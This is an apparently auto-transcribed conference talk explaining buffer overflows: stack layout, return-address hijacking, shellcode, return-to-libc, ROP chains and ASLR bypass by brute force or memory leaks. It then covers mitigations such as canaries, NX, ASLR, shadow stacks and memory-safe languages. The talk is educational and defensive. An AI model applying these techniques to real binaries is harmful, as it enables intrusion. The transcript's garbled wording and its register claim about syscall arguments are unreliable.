
Welcome everyone. Uh thank you for staying till the end. Um this talk is going to be about um breaking down buffer overflow exploits. Um so we we'll be talking for for the next 25 minutes we'll be um talking about what are buffer overflow attacks. Uh how does the how do you see such kind of uh vulnerabilities in the in binaries and how do you patch them. So we we'll be doing a whole uh end to- end discussion about uh what these about this security issue. Um and also we'll be talking about some uh newer research trends that are uh going on in this space. Um so just a quick uh intro about me. I'm a
I'm a software security engineer at block. uh pretty active in the in the cyber security industry and love to give such kind of talks as well. Um and uh avid CTF player uh did my masters from Georgia Tech uh in cyber security. Uh so I guess like before we start would like to just uh get a good understanding of the audience. Um, have you guys ever used a buffer overflow in maybe like a CTF or maybe discovered a real life security issue that has this? Uh, okay. I guess so we have like a mixed audience who some of them don't know what a buffer overflow is, but we do also have people who have discovered
this. Um, so this is a security issue. Um you can find this in um binaries where you're uh when once you have a an entry point through an input that the binary accepts um and through that one input you can potentially hijack the whole binary and uh basically get control over it maybe potentially also get a shell um and uh if the binary is running as root then uh then you're pretty much good because uh now you have shell access as root. Um so this is just one entry point in the binary that can do a lot of magic for you. So uh and uh there have been real life examples as well of this happening
in a lot of production grade real life software that we use. Um some examples would be the Chrome browser that has this that has so many of these security issues that were discovered. um a lot of them like basically any any program that um use C, C++, uh like these these languages where where you have uh system level languages where you have uh control over um the memory of the program with the exception of of course these newer uh languages that are out there like Rust which has a totally different mechanism to handle this uh security issue of it has totally different uh way of handling memory. So um while I mean uh you might have seen
typical examples in CDF challenges where you discover a buffer overflow um but like there have been a lot of good mitigations out there and uh these security issues are um not as prevalent as they were before. It's also called a stack smashing. Um and uh so let's let's take a quick look at how does this how how what is a vulnerable program that can cause this. So this is a very simple threeline program. We have a function and we have a the character array and we're using a vulnerable function called uh string copy. Um and we're just copying whatever we get is as the in the bar um as the argument and we're just copying it into
C. Um so if you see here in the in the last line we have no bounds checking on copy right. So if you go beyond the 12 so if you have an input that is beyond the uh the size of this character array which is 12 uh and it can potentially lead to a buffer overflow right. Uh so if you for example you have this uh if you put in like a big string in in in bar and when string copy decides to copy it into C into a C uh character array uh there's no bounds checking on it. So it's just going to copy the whole string. It's going to go beyond the limit of the 12 uh characters and it's
just going to copy uh into the into the program memory. And what's this going to cause is going to cause a a a buffer overflow. Um and there are various different ways in which you can use buffer overflow to do a lot of interesting things. Um so let let us like uh firstly look at the memory layout in in our computer. So this is a this is a program memory. So you have a you have a runtime heap, you have a readwrite segment and then you have the stack and at the top you have the kernel memory. Um and the stack layout is on on the right. Um so whenever you like call a function you have the return address
stored on the stack. You also have the function parameters which are which is the bar over here. Um you also have the previous frames uh base pointer and uh some local variables that are also saved on the stack which is the character array. Right? So everything for the function is stored on the stack uh including the frame pointer, the return address and the function parameters. And uh you can do a lot of interesting stuff with this once you uh once you're able to gain control of the stack. So this is a normal stack state right and for this specific example um this is how it would look on the stack. So we have the character array as I said um
which is of lin 12. Then we also have the bar character which was the function argument and this is the frame pointer and the return address for the for the function. Uh basically this is the return address to which the function will be returning after after it's been called. So uh let's say you copy like a string hello which has a null bite at the end. Um and it is within the limit of the the the character array of 12. Right? It's just a fivelet string. Uh so no issues with that right now. There's no overflow here. It's just a simple string that we copied in the character array. Now let us see what happens if we go beyond the
12 uh limit here. Right. So we just copied a a string that is more than the 12 character limit. And uh notice how it's overflowing the whole stack now, right? It's it's overriding the content within the safe frame pointer. It also overriding the return address here, right? So if you're able to override the return address, you can basically hijack the program flow here. So we craft our payload in such a way that we are able to hijack the return address because the return address is the key here. Once we are able to do hijack the return address, we can do a lot of good stuff. Um so what we do here is we craft a payload which has a bunch
of these A's and then it has a it has a little Indian address which is this right and this address points to the top and now you can put in basically a lot of interesting stuff over there and you can you can hijack the program flow. Uh but this is essentially how a buffer overflow is going to occur right. Um now what what what can you do once you have this capability to you know override the return address? You can do multiple things. Um you can do a return to lip c attack. Uh you can also use um rob chains um to um to basically u pivot and uh hijack the binary and you can also inject a
shell code. Um but this is uh we're going to cover all these scenarios um and which in which situations you'll be using which of these uh attack methods. So uh let's talk about the first one. I I mentioned shell code injection, right? So shell code injection is basically you have this uh piece of code that can do like for example spin up a new shell. Um, so what we're going to do here is we're going to inject our own shell code in the payload that we just sent. Like instead of the AS over here, we're just going to have our shell code and we're in the return address, we're going to point to the shell code. So what will happen is when
the program is done executing, it's going to go to the return address which is going to point to the shell code and the shell code is going to execute. Um, but this only happens in situations where the stack is executable. So um your binary uh has a lot of these flags and if it has the nx bit which is the uh the executable bit if it is set if it is set then you can basically execute whatever code there is on the stack which is not a good practice because uh you can do stuff like having shell code injection. Um so this is not commonly uh present in in binaries like usually whenever you like create a
simple C program or any kind of any kind of program this is not enabled by default right now because it's um a security issue. So if you want to actually enable this and try it out by yourself you'll have to manually do that through uh like a GCC flag or something. So um and this is for security reasons of course. So uh you can use the shell code um and it it is very architecture specific. Um you also have uh shell code that is um that can be architecture agnostic as well. Uh but usually it is very architecture specific. So if you want to hijack a binary that is a 32-bit binary or a or
ARM binary then you'll have to have a shell code that is um specific to that kind of an architecture and it'll only work on that architecture generally that that's the case. Uh the second part that I mentioned was return to lipy and the third one was uh rob. So in case of return ellipsey what we do is uh so imagine a situation where u the stack is not executable right so this is a normal binary so you you basically we saw a case where the stack was executable but we're not going to have such situations in in real life right so what we could potentially have is uh a non-executable stack so now what you do now you can use something like uh
return to lipy which basically Um what you do is um when you do the buffer overflow you uh craft your payload in such a way that you have a have the buffer then you have the address of a ellipse C function um and then you can have a have a garbage return pointer and then the argument to the to the lip function. So this is exactly how it should be looking like here. Um so what this does is so system is a lipy function. So if you're able to get the address of system within the binary uh you can just put place the address over there so that it aligns with EBP and then you can use the BNSH
argument to the system function which is ellipsy function and once this is called you can basically get shell access through the binary. Uh now this can be a case where like a binary is remotely hosted and you you're able to like uh use netcat or like maybe uh through a socket get access to the binary and you can like remotely provide your payload and basically just get shell access uh through this uh and the third issue uh sorry the third uh attack that we have here is called return oriented programming. And this is this is a an attack of its own league. I mean there's been so much research going on with this. Uh so this
is uh a very uh interesting kind of a uh trick that security uh researchers use. Um you basically what you do is you have a set of curated instructions that you use to um entirely hijack the program flow and basically execute um any kind of function that you want, right? Uh that function could be within lipy um or maybe that could be just a program function. And you can you can basically do a lot of these things and and a fun fact is that return oriented programming is actually Turing complete. So you can basically use this as a as a full-fledged programming language you can do a lot of uh like things like basically just getting shell or maybe if
you want to have a reverse shell or basic since it's literally acting like a programming language you can do a lot of things with it. Um so the way this works is you instead of the the lipy address that we saw here system you um you just pick uh and the limitation here is that uh if you see we we add a a fake return pointer here. So what's going to happen here is once you call the system function once you once you have the shell um and if you if you try to kill the shell it's going to crash the program because it's going to go to a fake return pointer. So it doesn't know
what to do once the system function is done executing. So what what in case of return oriented programming what you can do is you can have the program to continue executing stuff on behalf of you. So u it is basically what's going to do is it's going to execute a function then it's going to return back to the program. It's going to execute another function um and you can basically just do anything with it. Um and we use these thing called uh rob gadgets for this uh which are just instructions within the binary that have this format where it is a pop instruction and then there's a return instruction after that. Uh usually those are that's the way that you uh find
these gadgets and um align those addresses to the to the when you're like crafting a payload you use this um and the reason why you have this pop uh why this works is because whenever you execute a a system call you are expected to have um the arguments within the registers. So uh the first argument is I believe in RDX or EDX um in case of 64-bit. And uh once you do that um once you have the right arguments in the right registers you can just call the system call and basically just do anything with this. Uh the these are some examples of u of real vulnerabilities that we found recent and all of these are recent like pretty
recent you can say. Um so there was a heap buffer overflows found in in Chrome's webp image library. Uh there was also one in kernel as well as in uh lipy uh gipy which is the genu version of lip uh the C library. Um so it's not um I mean uh all of these are basically uh programs that are extensively written in C. Um so uh I mean you I I expect to uh people at security researchers to continue to find such kind of security issues until we have uh like programs that are extensively using these low-level memory based uh programming languages. So what are some protections that we can use against these kinds of
overflows and these are actively being used in in binaries. Uh the first one is a stack canary. The second one is the NX bit. I mentioned this right now. Uh basically there's the no execute bit which um helps us to like make the me memory pages non-executable. And there's two more um address space layout randomization and uh some Linux and Windows specific protections. And all of these are enabled by default on on all of the binary programs that you write these days. So you won't have to worry about uh enabling these explicitly. They're already just I mean if you just like compile a simple program with C, these will uh by default be enabled on
on all of your programs explicitly. You'll have to say if you if you want to like create a binary that does not have these uh security protections, you'll have to explicitly do that. Um so the first protection that we saw was the stack canary, right? So in our in our first case we saw how does the buffer overflow happen right we basically able to u overflow and write to the return uh return address but in this case what you can do is you can use a need a little trick you can use a a canary which is uh essentially just a a random uh private value that you put in before the return address. So whenever you try to override
the vulnerable buffer, it's also going to override the canary the this value. And what the program does is uh every time it um it is executing, it's going to compare the the value of this versus what it is right now on the stack. And if the if they don't match then it it triggers that it knows that a a buffer overflow is taking place uh because the value is now overwritten and um and it's not matching the value that it had in the in the in the GS segment. So it's going to trigger that that uh there's a buffer overflow and it's going to uh stop the program in this case. It's it's just not
going to allow it to execute. The second thing is um address space layout randomization. In this case, what happens is um the you have a bunch of uh aspects to your program. So you have the heap, you have the stack, you have the library code, basically the code for all of the libraries that are linked to the binary along with the program code. So uh what your what your uh uh system does is it basically just randomizes the base address of the program um every time you execute the binary. And the benefit of this is it protects against um um um the the return oriented programming issue that we talked about because for that to
work you need to have you need to know the um the address of the library function that you're trying to execute. So for example, if you want to execute system, you have to know what is the address of it. But the problem here is every time you execute the binary, the address is going to change. But one thing that is happening here is only the base address is randomized. So uh so the system function is going to be in the library code over here but only the base address of this is randomized. So if we figure out the base address in some way we can basically get to system because it is just an offset value from that
base address in the library code. So all we need to do in order to break ASLR is just to guess or maybe um figure out in some way the base address for all of these uh components of the program. Um in case of a 32-bit binary it is you can you can actually use brute force to do that because we only have a 32-bit um space that we have to uh guess. I mean you can just brute force the whole program and and guess this uh by since the 32-bit space can be exhausted pretty soon but this is not possible for a 64-bit program um you won't be able to do this. So in that case what you do is
you just find uh um leaks in the binary memory leaks in the binary and uh you just try to get the base address from that. Uh so there so these are the two things that I uh attackers techniques that we we talked about already. Um and there there's also another uh another few things that attackers also do is they try to remove the canary or just brute force it. And there's another trick called uh heap spring that is uh that's also pretty uh popular. there are some recent advancements um in in exploitation that were here I mean in in specifically like protecting against these kind of security issues and a lot of them are actually on the
hardware side like if you see um you have the we have these hardware shadow stacks which are essentially uh um the the hardware maintains a new copy of the stack which is the shadow stack and if if it if it doesn't align with the actual stack it's going to complain uh and it's like basically ally just going to protect the returns. Then we also have this pointer authentication that was launched by ARM um which basically just signs the pointer address and uh once you sign that using like a cryptographic signature you can um you can just make sure that it's not tampered with and of course the last thing is to use memory safe languages
like Rust and Go. Rust is pretty good at tackling all of these issues um because it uses a totally different way for memory management. It uses a concept of ownership to make sure that um like these heap or like overflow attacks don't don't happen and and its compiler is pretty picky about uh about like detecting all this stuff and make sure that it doesn't compile if if it notices any like uh memory issues within the program. So what are some of the things that you can do here um to fix this? You can obviously like patch your code um or you can use this um defensive depth which is already done for you by the by
the by the computer where like it automatically enables these protection mechanisms like canaries uh ASLRs and all those other things. And the third thing that you can do is use memory safe languages. So if you if you're considering using C, try to replace it with something like Rust. And finally, um, as I guess every security team would suggest, keep your software up to date because there are a lot of these security issues zooming out in the wild, but uh um once you have this your systems and software updated, you can like um have it protected against these security issues. And yeah, I guess we're on time. We just have about a minute. And uh if you want to grab a copy of
this presentation, I know the presentation was a bit u text heavy, but uh that's actually to for you to guys to refer to the presentation once this is done. So you can just uh if you like forgot about some things and you want to refer back, you can refer back to the text. So you can use this QR code or um just uh go to the URL to get the slides.